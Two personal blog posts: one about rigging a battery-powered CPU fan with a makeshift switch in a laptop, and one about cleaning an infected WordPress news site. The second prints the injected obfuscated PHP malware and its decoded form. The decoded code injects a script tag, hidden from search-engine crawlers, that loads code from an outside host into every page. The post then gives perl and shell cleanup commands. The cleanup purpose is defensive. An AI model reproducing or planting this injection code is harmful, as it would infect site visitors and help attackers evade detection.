Monday, May 17, 2010

Time-Pass Engineering

It was just a month after the warranty of my Latitude laptop had expired that the CPU fan stopped cooling the laptop's processor. It was good I realised it early, else the laptop's processor would have melted some day. The very next day after this realisation I called up Dell customer care and asked for a replacement fan; the customer care executive did some troubleshooting steps with the diagnostic disc supplied with the laptop and came to the conclusion that the fan had to be replaced. He promised to send me a quotation for the fan in a few days. After some days I got an email saying that the product (fan) is EOL, so they can't supply it anymore. I was not able to use my laptop just because of this, but since I had another laptop given by my office, it was not a trouble for me.

Some weeks later I opened my laptop and took the CPU fan out. My plan was to get it repaired with the help of some electrical shop; meanwhile I got some information about some laptop repair shops. At one shop I was told that the fan can't be repaired but they could get the same fan within a week, but two weeks later the shopkeeper refused as he was not able to find one for me. I tried another shop; he kept the fan for three days and finally called me back saying the fan was working. He asked me to bring the motherboard and offered to fix this. I was not willing to leave my machine at his shop and he refused to repair it in front of me. I got the fan back and thought to get it fixed later with someone else.

Once again I called up Dell and told them it is not the fan but the power connector on the motherboard which is not supplying any power to the fan. Last weekend I was not having any plans, and because of the hot sun outside I didn't want to go outside my room. I checked the power requirement of the fan: it was 5.0 volt. With the idea of checking it I bought three pencil cell batteries, each of 1.5 volt. With the help of a thin wire I connected the batteries to the fan wires and finally I saw the fan in working condition. Here I started my mind's engineering capability to fix the fan.
I connected two wires to the power connector of the fan and pasted transparent tape on it so that it doesn't create any short circuit with the motherboard. Then I found a place to keep two batteries inside the laptop body. I could have done some more research on the motherboard to find a suitable point where I could get the desired voltage for the fan, but unfortunately I was not having any multimeter kind of device to check the voltage coming out from the various available points on the motherboard. Then I thought if I fix the fan directly to the batteries it will remain in an always-on situation and the batteries will die soon. Now I was thinking to purchase a small switch button to control the fan. Looking at the datacard panel on the board I started the mechanical engineer portion of my mind. Have a look at the pictures next.
This picture above shows the switch in the off state.

This picture above shows the switch in the on state.

If you observe carefully you will see a black plastic stick; the purpose of the stick is to push out the internet datacard, which I don't use in my laptop as I have a USB wireless modem. I pasted one wire to this stick and the other wire to the iron plate with the help of adhesive; this was the most time-taking task as it needs to be done with complete perfection. Finally the switch is ready: all I have to do is pull the stick out to make the circuit on and push it back to turn off the circuit.

Next I carefully fixed the batteries and aligned the wires so that they don't cause any hindrance while closing the laptop. I fitted back all the components carefully and was ready to boot up my machine.

Just to keep an eye on the fan's working I enabled the temperature monitoring widget on my Fedora desktop, though I don't find any option to raise a sound alert in this applet. Maybe I will sit another weekend and look into the code of this Fedora desktop widget to have an option of setting a sound alarm when the temperature goes higher than a certain point.

Saturday, May 8, 2010

When WordPress Site was Hacked

Long ago I opted to read news online, avoiding the wastage of newsprint, and I bookmarked various news websites for reading news every morning; it became a habit to check out the bookmarked websites early in the morning. Yesterday morning when I opened one of the bookmarked websites for news about Himachal, the website was redirecting me to some interesting page, and this page was offering some exe for cleaning up a virus from my computer. How funny.... the site was telling me to clean a virus from my Linux laptop.. ha ha ha..

Investigating more about the website I found this was happening from the server side. I passed on a message to the website owner, as he was known to me, saying that something is breaking on his site. Later I got a call from the website owner saying that some malicious code was added to each page on the webserver. Here is the code he has sent:
----code begins here----

<?php /**/ 
eval(base64_decode("[long base64 string omitted; its decoded form is shown below]"));?>
----code ends here----
Here is the expansion of the decoded string:
----expansion starts here ----
if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){
    $GLOBALS['mr_no']=1;
    if(!function_exists('mrobh')){
        if(!function_exists('gml')){
            // Returns the injected <script> tag, but hides it from Google and Yahoo crawlers
            function gml(){
                if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){
                    return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly96ZXR0YXBldHRhLmNvbS9qcy5waHAiPjwvc2NyaXB0Pg==");
                }
                return "";
            }
        }
        if(!function_exists('gzdecode')){
            // Minimal gzip decoder so the hook also works on compressed output; the random-looking
            // variable names are part of the obfuscation
            function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){
                $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));
                $RBE4C4D037E939226F65812885A53DAD9=10;
                $RA3D52E52A48936CDE0F5356BB08652F2=0;
                if($R30B2AB8DC1496D06B230A71D8962AF5D&4){
                    $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));
                    $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];
                    $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;
                }
                if($R30B2AB8DC1496D06B230A71D8962AF5D&8){
                    $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
                }
                if($R30B2AB8DC1496D06B230A71D8962AF5D&16){
                    $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
                }
                if($R30B2AB8DC1496D06B230A71D8962AF5D&2){
                    $RBE4C4D037E939226F65812885A53DAD9+=2;
                }
                $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));
                if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){
                    $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;
                }
                return $R034AE2AB94F99CC81B389A1822DA3353;
            }
        }
        // Output-buffer callback: inserts the script tag just before </body> on every page served
        function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){
            Header('Content-Encoding: none');
            $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
            if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){
                return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);
            }else{
                return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();
            }
        }
        ob_start('mrobh');
    }
}
----expansion ends here----

Well, it will take some more time for me to understand this. Later I was given shell access to this web server to check out the problem. I used perl to remove this code from the php file:

perl -p -i -e 's/.*=="\)\);\?>//g'

But this was not enough; the website was giving errors even after this. It was a hard time: prior to this the website was redirecting, but now the website was getting displayed without CSS. At this time I was more worried as the whole website was looking very ugly. I called up the website owner and the call was a relief for me; I was feeling the owner might be unhappy with me for giving this ugly look to his website, but he was calm, which motivated me. Struggling some more with the php files for some other malicious code, I checked out the error logs and found there were some problems in sending php headers, and I immediately remembered my college days when my php project stopped working because one empty line was added in the login page.

So I again executed the following perl command to clean up the empty lines:
perl -p -i -e 's/^\n//g'

and the website was up again.

Here is the piece of code which can fix a similar problem in one go; all you need to do is move to the root directory of your webserver and execute:

for i in $(find . -name "*.php"); do if [ -f "$i" ]; then perl -p -i -e 's/.*=="\)\);\?>[^.]*//g' "$i"; perl -p -i -e 's/^\n//' "$i"; fi; done

I had to use two regular expressions as the newline character was giving trouble to me. I would like to mention that this expression will work for the above-mentioned malicious code; you may have to tweak the expression if you have some other malicious code added to your WordPress site.

If you don't have shell access to the webserver, another solution to such a problem can be updating WordPress; if you already have the latest version you get the option of reinstalling WordPress, which actually replaces all the affected php files, so the malicious code in them will be removed automatically. In case you have a custom theme you have to update your theme files also, and also the plugins you are using in your WordPress site.

I am still confused how the hacker was able to add this php code; as I don't have sudo access on the webserver I could not get more details for you, will try to detect it somehow..

Happy Wordpress people.. Happy Open Source..